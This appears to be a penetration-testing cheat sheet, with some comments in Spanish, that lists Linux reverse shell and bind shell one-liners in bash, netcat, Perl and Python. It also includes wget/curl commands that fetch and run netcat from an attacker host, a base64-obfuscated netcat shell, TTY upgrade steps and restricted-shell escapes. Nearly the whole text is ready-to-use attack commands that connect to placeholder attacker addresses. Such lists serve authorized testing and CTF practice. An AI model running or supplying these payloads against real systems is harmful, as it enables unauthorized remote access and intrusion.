Linux/Unix
Reverse shells
Bash
bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'
bash+-c+'bash+-i+>%26+/dev/tcp/<attacker-IP-address>/<listen-port>+0>%261' # URL Encode
bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker-IP-address> <listen-port> >/tmp/f
echo -n "nc.traditional -e /bin/bash <attacker-IP-address> <listen-port>" | base64 -w 0
bmMudHJhZGl0aW9uYWwgLWUgL2Jpbi9iYXNoIDxhdHRhY2tlci1JUC1hZGRyZXNzPiA8bGlzdGVuLXBvcnQ+
`echo "bmMudHJhZGl0aW9uYWwgLWUgL2Jpbi9iYXNoIDxhdHRhY2tlci1JUC1hZGRyZXNzPiA8bGlzdGVuLXBvcnQ+" | base64 -d`
Netcat
/bin/nc -nv <attacker-IP-address> <listen-port> -e /bin/bash
/usr/bin/nc -nv <attacker-IP-address> <listen-port> -e /bin/bash
# Máquina atacante
cp /bin/nc .
python3 -m http.server 80
nc -lvnp <listen-port>
# Máquina víctima
## wget
wget http://<attacker-IP-address>:80/nc -O /tmp/nc; chmod 755 /tmp/nc; /tmp/nc -nv <attacker-IP-address> <listen-port> -e /bin/bash
## curl
curl http://<attacker-IP-address>:80/nc -o /tmp/nc; chmod 755 /tmp/nc; /tmp/nc -nv <attacker-IP-address> <listen-port> -e /bin/bash
Perl
perl -e 'use Socket;$i="<attacker-IP-address>";$p=<listen-port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
# /bin/sh
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker-IP-address>",<listen-port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# /bin/bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker-IP-address>",<listen-port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash"]);'
Bind shells
Bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp <listen-port> >/tmp/f
Python
python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",<listen-port>));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'
Spawning TTY shell
General
script /dev/null -c bash
Ctrl+Z
# Para ZSH debe ser ingresado en una sola línea: stty raw -echo;fg
stty raw -echo
fg
reset xterm
# Obtener el valor de las siguientes variables desde otra ventana de terminal maximizada
echo $TERM
stty size
# Aplicar los valores obtenidos en la shell obtenida
export TERM=<term>
export SHELL=/bin/bash
stty rows <rows> columns <columns>
Python
which python
which python3
/usr/bin/<python-version> -c "import pty; pty.spawn('/bin/bash');"
sh
script /dev/null -c bash
Escapar shell restringida
man ls
shift + 1
!bash
vim
:set shell=/bin/sh
:shell